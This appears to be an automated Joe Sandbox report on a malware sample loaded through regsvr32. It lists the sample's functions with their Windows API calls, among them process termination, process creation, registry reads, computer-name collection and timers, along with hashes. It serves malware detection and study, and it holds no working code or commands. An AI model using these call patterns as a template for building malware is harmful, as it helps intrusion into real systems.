                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateFreelstrlen$lstrcpy
                • String ID:
                • API String ID: 1531811622-0
                • Opcode ID: 1c26c20c2b200a7f7f01197225d6b3f70d47788814bd0cb6950b7c300cd66609
                • Instruction ID: 59663640e97d7edc6423d8a6b046b500054d581f2a892900a8c1f3c039a91e7e
                • Opcode Fuzzy Hash: 1c26c20c2b200a7f7f01197225d6b3f70d47788814bd0cb6950b7c300cd66609
                • Instruction Fuzzy Hash: D621F231508244AFEB229F76DC44F66BFAAEBCA750F0540AAE8449B212D775EC06D770
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC64A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BC45AA: lstrlen.KERNEL32(00000000,00000000,7691C740,74E481D0,?,?,?,04BC64BB,?,00000000,74E481D0,?,?,04BD09CA,00000000,0624C0E0), ref: 04BC4611
                  • Part of subcall function 04BC45AA: sprintf.NTDLL ref: 04BC4632
                • lstrlen.KERNEL32(00000000,7691C740,?,00000000,74E481D0,?,?,04BD09CA,00000000,0624C0E0), ref: 04BC64CD
                • lstrlen.KERNEL32(?,?,?,04BD09CA,00000000,0624C0E0), ref: 04BC64D5
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • strcpy.NTDLL ref: 04BC64EC
                • lstrcat.KERNEL32(00000000,?), ref: 04BC64F7
                  • Part of subcall function 04BD4E2F: lstrlen.KERNEL32(?,?,?,00000000,?,04BC6506,00000000,?,?,?,04BD09CA,00000000,0624C0E0), ref: 04BD4E40
                  • Part of subcall function 04BC57E0: RtlFreeHeap.NTDLL(00000000,?,04BC222D,?,?,?,?,?,?,?,?,04BC1089,?,?,?), ref: 04BC57EC
                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04BD09CA,00000000,0624C0E0), ref: 04BC6514
                  • Part of subcall function 04BD91FF: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04BC6520,00000000,?,?,04BD09CA,00000000,0624C0E0), ref: 04BD9209
                  • Part of subcall function 04BD91FF: _snprintf.NTDLL ref: 04BD9267
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                • String ID: =
                • API String ID: 2864389247-1428090586
                • Opcode ID: 1c4c529260e3b6e63363e6bc4da71c276d5c382f7fbd892be78657009b7b973b
                • Instruction ID: 206bf1d7cf32a43c7aa4de2f8ee09f13bdd251b1dc964d91cad8cac3a4b85ff0
                • Opcode Fuzzy Hash: 1c4c529260e3b6e63363e6bc4da71c276d5c382f7fbd892be78657009b7b973b
                • Instruction Fuzzy Hash: 7111A3339016297B97227B799CC8C7F37ADDE8865431540DAF904AB201DE78FE0157B1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC6584 Relevance: 10.6, APIs: 7, Instructions: 67threadCOMMON
                Download Yara Rule
                APIs
                • SwitchToThread.KERNEL32(?,?,04BCE039), ref: 04BC65AF
                • CloseHandle.KERNEL32(?,?,04BCE039), ref: 04BC65BB
                • CloseHandle.KERNEL32(00000000,74E5F720,?,04BC6113,00000000,?,?,?,04BCE039), ref: 04BC65CD
                • memset.NTDLL ref: 04BC65E4
                • memset.NTDLL ref: 04BC65FB
                • memset.NTDLL ref: 04BC6612
                • memset.NTDLL ref: 04BC6629
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: memset$CloseHandle$SwitchThread
                • String ID:
                • API String ID: 3699883640-0
                • Opcode ID: 85ba1c8074ff230fd1f392e13ef5783354c9c25d6367ee427999ed8ee1c2d7e2
                • Instruction ID: 6fac963b3365eaf2e90b993c222fb82112007411e83a842d9340702860dd0e0d
                • Opcode Fuzzy Hash: 85ba1c8074ff230fd1f392e13ef5783354c9c25d6367ee427999ed8ee1c2d7e2
                • Instruction Fuzzy Hash: 11118F319019207BE5223B2BEC88D6B7B6CEFD6714F0400BAF104AB545D768FE0496FA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD4FBE Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BD4FEF
                • wcstombs.NTDLL ref: 04BD5000
                  • Part of subcall function 04BCFF8B: StrChrA.SHLWAPI(04BEE21C,0000002E,00000000,00000000,?,04BEE21C,04BD739D,00000000,00000000,00000000), ref: 04BCFF9D
                  • Part of subcall function 04BCFF8B: StrChrA.SHLWAPI(00000004,00000020,?,04BEE21C,04BD739D,00000000,00000000,00000000), ref: 04BCFFAC
                • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 04BD5021
                • TerminateProcess.KERNEL32(00000000,00000000), ref: 04BD5030
                • CloseHandle.KERNEL32(00000000), ref: 04BD5037
                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04BD5046
                • WaitForSingleObject.KERNEL32(00000000), ref: 04BD5056
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                • String ID:
                • API String ID: 417118235-0
                • Opcode ID: 97e9c98c66701a19c2218b894d80affcff29bc6da72ed8ec797cb618fd20b995
                • Instruction ID: 45604f5426b04c074b037fc9c115003b922c153d8e72c55ab064aca5fbd8a39e
                • Opcode Fuzzy Hash: 97e9c98c66701a19c2218b894d80affcff29bc6da72ed8ec797cb618fd20b995
                • Instruction Fuzzy Hash: 0711B231100A16BBE730AF66DC48F6A7B68FB44751F040091F905AB181D7B9ED54CBF0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCD5F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D66
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D7F
                  • Part of subcall function 04BD0D54: GetCurrentThreadId.KERNEL32 ref: 04BD0D8C
                  • Part of subcall function 04BD0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D98
                  • Part of subcall function 04BD0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0DA6
                  • Part of subcall function 04BD0D54: lstrcpy.KERNEL32(00000000), ref: 04BD0DC8
                • lstrcpy.KERNEL32(-000000FC,00000000), ref: 04BCD633
                • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00002365), ref: 04BCD645
                • GetTickCount.KERNEL32 ref: 04BCD650
                • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,?,00002365), ref: 04BCD65C
                • lstrcpy.KERNEL32(00000000), ref: 04BCD676
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                • String ID: \Low
                • API String ID: 1629304206-4112222293
                • Opcode ID: a59e5d82a67be40655acc5460371dfaafe16ce32236cb5c5ca098db13e19527f
                • Instruction ID: 282946698e93dd064fb0faadec98d24d99075e67c09a3f3de6b4d18d6788d0c8
                • Opcode Fuzzy Hash: a59e5d82a67be40655acc5460371dfaafe16ce32236cb5c5ca098db13e19527f
                • Instruction Fuzzy Hash: CE01F531201A25BBD6207A769C88F6B779CDF85755F0201BAF408DB141DB28FD01C7B9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCAEC5 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48libraryloaderCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleA.KERNEL32(?,?,?,?,?,04BC1DC6,00000000), ref: 04BCAEE6
                • GetProcAddress.KERNEL32(00000000,?), ref: 04BCAEFF
                • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,04BC1DC6,00000000), ref: 04BCAF1C
                • IsWow64Process.KERNEL32(?,?,?,?,?,?,04BC1DC6,00000000), ref: 04BCAF2D
                • CloseHandle.KERNEL32(?,?,?,?,04BC1DC6,00000000), ref: 04BCAF40
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HandleProcess$AddressCloseModuleOpenProcWow64
                • String ID: PWt
                • API String ID: 4157061983-1902262044
                • Opcode ID: b27a067e74eb1a8877280f1e8f2f4fd789c089d6440ae3f1e93e588d19009f08
                • Instruction ID: 6240dd18e8d42ca5c0a93951211d4ea76afd142f83fbc5df941c2b5da63c053f
                • Opcode Fuzzy Hash: b27a067e74eb1a8877280f1e8f2f4fd789c089d6440ae3f1e93e588d19009f08
                • Instruction Fuzzy Hash: 09012DB190050AEFCB21DF66D88899ABBA8FBC8351B14869BE505DB101E735AE01DB70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCCC2E Relevance: 9.1, APIs: 6, Instructions: 122threadCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleA.KERNEL32(00000000,?), ref: 04BCCC89
                • GetLastError.KERNEL32 ref: 04BCCCAF
                • SetEvent.KERNEL32(00000000), ref: 04BCCCC2
                • GetModuleHandleA.KERNEL32(00000000), ref: 04BCCD0B
                • memset.NTDLL ref: 04BCCD20
                • RtlExitUserThread.NTDLL(?), ref: 04BCCD55
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                • String ID:
                • API String ID: 3978817377-0
                • Opcode ID: b61f79caffb005596cde62982ef67acaa7bbaddca9b1be6978962eb5c68144dc
                • Instruction ID: 1eddbb924289dc7d47a4db26da0791a0b19c33c3a9f1bb9df00d48c7e83a5125
                • Opcode Fuzzy Hash: b61f79caffb005596cde62982ef67acaa7bbaddca9b1be6978962eb5c68144dc
                • Instruction Fuzzy Hash: FE415CB1900604AFDB209F69CDC886BBFBDEF95711724459EE90AE7100D775AD40DB70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCCD5C Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fc9df7325c24b328d651427d46425aed1b00eeb70b59154b240d2db0b99a33e3
                • Instruction ID: b22ffe2ea1b9c0b056a4887a15b548f0604105af3eddd6e1e7b9c564c18eda82
                • Opcode Fuzzy Hash: fc9df7325c24b328d651427d46425aed1b00eeb70b59154b240d2db0b99a33e3
                • Instruction Fuzzy Hash: 73419171500716DFD730AF39888495BBBB9FB85365B104EAEF16AC7580E770F8018B61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD74AD Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BD74EA
                • HeapFree.KERNEL32(00000000,04BED06E,?,?,04BC906C,?,04BED06E,?,?,?,?), ref: 04BD7520
                • GetComputerNameW.KERNEL32(00000000,?), ref: 04BD752E
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BD7545
                • GetComputerNameW.KERNEL32(00000000,?), ref: 04BD7556
                • HeapFree.KERNEL32(00000000,00000000,?,?,04BC906C,?,04BED06E,?,?,?,?), ref: 04BD757C
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateComputerFreeName
                • String ID:
                • API String ID: 3439771632-0
                • Opcode ID: 51240abb5aa0fce77704b9f31593560a57610487ecc5da23caac7dd29df680ab
                • Instruction ID: 4b49f8d393b3dde612fc178af11e3eec49b103ad952c97eee82743ea9de3e0be
                • Opcode Fuzzy Hash: 51240abb5aa0fce77704b9f31593560a57610487ecc5da23caac7dd29df680ab
                • Instruction Fuzzy Hash: D231CBB6900209EFDB10DFB6DD859AEBBF9FB84304B1044AAE405D7601EB34EE459B70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC3DA2 Relevance: 9.1, APIs: 6, Instructions: 93memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(?), ref: 04BC3DBE
                • lstrlen.KERNEL32(?), ref: 04BC3DD4
                • lstrlen.KERNEL32(?), ref: 04BC3DE9
                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04BC3E4E
                • _snprintf.NTDLL ref: 04BC3E74
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 04BC3E93
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateFree_snprintf
                • String ID:
                • API String ID: 3180502281-0
                • Opcode ID: c77d1a3f0695c41171b1663929c0792fdbfd598f4d398919cc0ded4fc47feeaf
                • Instruction ID: 51da01895cf40433b81263922602f8bc53e84c6d62578c854d984f19809cd4b6
                • Opcode Fuzzy Hash: c77d1a3f0695c41171b1663929c0792fdbfd598f4d398919cc0ded4fc47feeaf
                • Instruction Fuzzy Hash: FD314E72500219EFDB11DF66DC848AA7BAAFB84344B05946ABC05AB101D735AD10ABA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD5FA2 Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON
                Download Yara Rule
                APIs
                • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 04BD5FBC
                • CreateWaitableTimerA.KERNEL32(04BEE268,00000003,?), ref: 04BD5FD9
                • GetLastError.KERNEL32(?,?,04BDE5BD,?,?,?,00000000,?,?,?), ref: 04BD5FEA
                  • Part of subcall function 04BCBC31: RegQueryValueExA.KERNELBASE(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,00000003,00000000,?,00000000,?,04BDE5BD,04BDE5BD,?,04BD6019,00000000), ref: 04BCBC69
                  • Part of subcall function 04BCBC31: RtlAllocateHeap.NTDLL(00000000,04BD6019), ref: 04BCBC7D
                  • Part of subcall function 04BCBC31: RegQueryValueExA.ADVAPI32(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BCBC97
                  • Part of subcall function 04BCBC31: RegCloseKey.ADVAPI32(?,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?,?,?,00000000,?,?,?), ref: 04BCBCC1
                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BD602A
                • SetWaitableTimer.KERNEL32(00000000,04BDE5BD,00000000,00000000,00000000,00000000,?,?,04BDE5BD,?), ref: 04BD6049
                • HeapFree.KERNEL32(00000000,04BDE5BD,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BD605F
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                • String ID:
                • API String ID: 1835239314-0
                • Opcode ID: 9850da04fb4cba643af60d47e628933d69e2fb967601f4ea4ae6db435e810aa3
                • Instruction ID: 0b546584adec0d642d2b339485e5d04a576123051bceb914d919f07453fdef0a
                • Opcode Fuzzy Hash: 9850da04fb4cba643af60d47e628933d69e2fb967601f4ea4ae6db435e810aa3
                • Instruction Fuzzy Hash: E2312971900209EBCF20EFA6C8C9CAFBFB9EB94355B148096F505A7101E734AE40CB71
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD4E85 Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON
                Download Yara Rule
                APIs
                • StrChrA.SHLWAPI(00000000,00000020,00000000,?,00000000,?,?,?,04BD9A91,00000000,?,04BEE17C,?,?,04BEE218), ref: 04BD4E9D
                • StrChrA.SHLWAPI(00000001,00000020,?,?,?,04BD9A91,00000000,?,04BEE17C,?,?,04BEE218), ref: 04BD4EAE
                  • Part of subcall function 04BCAAD8: lstrlen.KERNEL32(04BD79F2,?,00000000,00000000,?,04BD79F2,00000000,?,00000001,00000000,00000001), ref: 04BCAAEA
                  • Part of subcall function 04BCAAD8: StrChrA.SHLWAPI(00000001,0000000D,?,04BD79F2,00000000,?,00000001,00000000,00000001), ref: 04BCAB22
                • RtlAllocateHeap.NTDLL(00000000,01000000,00000000), ref: 04BD4EEE
                • memcpy.NTDLL(00000000,?,00000007,?,?,?,04BD9A91,00000000,?,04BEE17C,?), ref: 04BD4F1B
                • memcpy.NTDLL(00000000,04BEE218,04BEE218,00000000,?,00000007,?,?,?,04BD9A91,00000000,?,04BEE17C,?), ref: 04BD4F2A
                • memcpy.NTDLL(04BEE218,?,?,00000000,04BEE218,04BEE218,00000000,?,00000007,?,?,?,04BD9A91,00000000,?,04BEE17C), ref: 04BD4F3C
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: memcpy$AllocateHeaplstrlen
                • String ID:
                • API String ID: 1819133394-0
                • Opcode ID: 4d5671938c042ba78ff28bffe9ff84aab3105fede8a595adf9bc85d3edcc7737
                • Instruction ID: 5ee05e5f8067b9aabbfe9e0214243fd1b390ba204a6adb99398a21efdac0800d
                • Opcode Fuzzy Hash: 4d5671938c042ba78ff28bffe9ff84aab3105fede8a595adf9bc85d3edcc7737
                • Instruction Fuzzy Hash: 76212C72A0020ABFDB11DF99CC84F9ABBACEF48754F1540D2E908DB151E675FD448BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC9470 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                Download Yara Rule
                APIs
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?), ref: 04BC94AF
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04BC94C0
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000,?,?,?,?), ref: 04BC94DB
                • GetLastError.KERNEL32(?,?,?,?), ref: 04BC94F1
                • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 04BC9503
                • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 04BC9518
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                • String ID:
                • API String ID: 1822509305-0
                • Opcode ID: b329751a2a0b507a9fe1a3750d9dc0e5bc0050be2b17a70ba691c02bb7484765
                • Instruction ID: 8010d44c8cb40d0edc3e10df9371e39571779acfab7faca21e7c0ee88154bbb8
                • Opcode Fuzzy Hash: b329751a2a0b507a9fe1a3750d9dc0e5bc0050be2b17a70ba691c02bb7484765
                • Instruction Fuzzy Hash: DA113076501128FBEF226BA6DC84CEF7F7EEF85390B004462F505E6051D6359A51EBB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD1FAE Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON
                Download Yara Rule
                APIs
                • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 04BD1FD6
                • _strupr.NTDLL ref: 04BD2011
                • lstrlen.KERNEL32(00000000), ref: 04BD2019
                • TerminateProcess.KERNEL32(00000000,00000000), ref: 04BD2058
                • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 04BD205F
                • GetLastError.KERNEL32 ref: 04BD2067
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                • String ID:
                • API String ID: 110452925-0
                • Opcode ID: 492a0cae7d103893bf962b37bec5bd14d96e09454e937a77b0fd7219f890d9b0
                • Instruction ID: 22b63cbfe3e2fd356f11f3a59df22b0401ea7cb91317487a4b3117c15c4efeac
                • Opcode Fuzzy Hash: 492a0cae7d103893bf962b37bec5bd14d96e09454e937a77b0fd7219f890d9b0
                • Instruction Fuzzy Hash: F511C172500644EFDB25AB71AD88D6E776DEBC8715B0004D6FA06DB041FA79E840CB70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC557E Relevance: 9.1, APIs: 6, Instructions: 66registrymemoryCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyA.ADVAPI32(80000001,?,74E5F710), ref: 04BC559C
                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 04BC55CA
                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04BC55DC
                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 04BC5601
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BC561C
                • RegCloseKey.ADVAPI32(?), ref: 04BC5626
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HeapQueryValue$AllocateCloseFreeOpen
                • String ID:
                • API String ID: 170146033-0
                • Opcode ID: 34f826c5ad41d78db2cb0d7e80f46364c80ee758dfbd8a8b319019aba44f6655
                • Instruction ID: e4301d0e175ec7509285f2299e469d4023ed627fc4aec6e91a5eec8f19b9c398
                • Opcode Fuzzy Hash: 34f826c5ad41d78db2cb0d7e80f46364c80ee758dfbd8a8b319019aba44f6655
                • Instruction Fuzzy Hash: 3C111776900119FFDB11DFAADD84CAEBBBDEB88244B0000AAE901E7111E775AE45DB20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDFCD1 Relevance: 9.1, APIs: 6, Instructions: 65memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(00000000,74E5F730,-00000001,00000000,?,?,?,04BCD8A7,?,00000000,000000FF), ref: 04BDFCE2
                • lstrlen.KERNEL32(?,?,?,?,04BCD8A7,?,00000000,000000FF), ref: 04BDFCE9
                • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 04BDFCFB
                • _snprintf.NTDLL ref: 04BDFD21
                  • Part of subcall function 04BE2BDD: memset.NTDLL ref: 04BE2BF2
                  • Part of subcall function 04BE2BDD: lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 04BE2C2B
                  • Part of subcall function 04BE2BDD: wcstombs.NTDLL ref: 04BE2C35
                  • Part of subcall function 04BE2BDD: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 04BE2C66
                  • Part of subcall function 04BE2BDD: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04BDFD2F), ref: 04BE2C92
                  • Part of subcall function 04BE2BDD: TerminateProcess.KERNEL32(?,000003E5), ref: 04BE2CA8
                  • Part of subcall function 04BE2BDD: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04BDFD2F), ref: 04BE2CBC
                  • Part of subcall function 04BE2BDD: CloseHandle.KERNEL32(?), ref: 04BE2CEF
                  • Part of subcall function 04BE2BDD: CloseHandle.KERNEL32(?), ref: 04BE2CF4
                • _snprintf.NTDLL ref: 04BDFD55
                  • Part of subcall function 04BE2BDD: GetLastError.KERNEL32 ref: 04BE2CC0
                  • Part of subcall function 04BE2BDD: GetExitCodeProcess.KERNEL32(?,00000001), ref: 04BE2CE0
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 04BDFD72
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                • String ID:
                • API String ID: 1481739438-0
                • Opcode ID: 8f9b5a906f420c40e0877760930a698e2d25285c6959251732ae7bea9cc9a538
                • Instruction ID: 9c53c5a6558cde25be76f5fbb4001125e382f1dbc5c602e90fbdbe3704ae66c9
                • Opcode Fuzzy Hash: 8f9b5a906f420c40e0877760930a698e2d25285c6959251732ae7bea9cc9a538
                • Instruction Fuzzy Hash: 43117F72600219BFDF11AF66DC44DAA3F6DEB84364B158096FD099B212D734EE149BB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD6FFE Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(?,00000001,00000000,00000000,?,?,04BD156F,04BDAF39,00000057,00000000), ref: 04BD7014
                • RtlAllocateHeap.NTDLL(00000000,00000009,00000001), ref: 04BD7027
                • lstrcpy.KERNEL32(00000008,?), ref: 04BD7049
                • GetLastError.KERNEL32(04BC209B,00000000,00000000,?,?,04BD156F,04BDAF39,00000057,00000000), ref: 04BD7072
                • HeapFree.KERNEL32(00000000,00000000,?,?,04BD156F,04BDAF39,00000057,00000000), ref: 04BD708A
                • CloseHandle.KERNEL32(00000000,04BC209B,00000000,00000000,?,?,04BD156F,04BDAF39,00000057,00000000), ref: 04BD7093
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                • String ID:
                • API String ID: 2860611006-0
                • Opcode ID: 91a53ddf459104e1c92d5eb0dcc09a6cc3a4108505847110f57215a7bfaaaf3c
                • Instruction ID: b28d5e8fe43a9d54febc6fdeaed0da3888448ddd95a3c14b9393e7dbac4f54f9
                • Opcode Fuzzy Hash: 91a53ddf459104e1c92d5eb0dcc09a6cc3a4108505847110f57215a7bfaaaf3c
                • Instruction Fuzzy Hash: 7F116675500205EFDB10AFB6DC848AFBBA8FB8536070444AAF455D7141EB34ED05DB70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD0D54 Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON
                Download Yara Rule
                APIs
                • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D66
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D7F
